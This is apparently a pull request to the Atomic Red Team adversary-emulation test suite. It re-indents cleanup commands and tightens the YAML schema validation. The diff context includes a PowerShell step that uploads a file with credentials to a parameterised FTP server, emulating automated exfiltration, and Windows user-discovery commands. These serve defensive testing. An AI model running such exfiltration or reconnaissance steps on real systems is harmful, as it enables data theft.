### PR TITLE
Fix schema validation to disable additional properties

### DIFF
--- a/atomics/T1020/T1020.yaml
+++ b/atomics/T1020/T1020.yaml
@@ -57,5 +57,5 @@ atomic_tests:
       $ftpUrl = "#{ftpServer}"
       $creds = Get-Credential -Credential "#{credentials}"
       Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds
-  cleanup_command: |
-    Remove-Item -Path "#{sampleFile}" -ErrorAction Ignore
+    cleanup_command: |
+      Remove-Item -Path "#{sampleFile}" -ErrorAction Ignore

--- a/atomics/T1033/T1033.yaml
+++ b/atomics/T1033/T1033.yaml
@@ -111,7 +111,6 @@ atomic_tests:
   description: "Identify the system owner or current user using native Windows command prompt utilities."
   supported_platforms:
     - "windows"
-  auto_generated_guid: 35b88076-7edb-4eb5-bdc5-11ede7f45c6a
   input_arguments:
     output_file_path:
       description: "Location of output file."
@@ -126,5 +125,5 @@ atomic_tests:
       echo User Domain: %USERDOMAIN% >> %file%
       net users >> %file%
       query user >> %file%
-  cleanup_command: |
-    del #{output_file_path}\\user_info_*.tmp
+    cleanup_command: |
+      del #{output_file_path}\\user_info_*.tmp

--- a/bin/validate/atomic-red-team.schema.yaml
+++ b/bin/validate/atomic-red-team.schema.yaml
@@ -21,6 +21,7 @@ properties:
 $defs:
   test:
     type: object
+    additionalProperties: false
     required:
       - name
       - description


### PR DESCRIPTION
**Details:**
Right now our schema validation doesnt check whether there are any additional properties that's specified in an atomic. If atomics are malformed, say cleanup_command is moved to the root path instead of `executor`, it allows the validation checks to pass. Setting `additionalProperties` to `false` in the YAML schema to fix this issue, 


**Testing:**
Tested on Github Codespaces
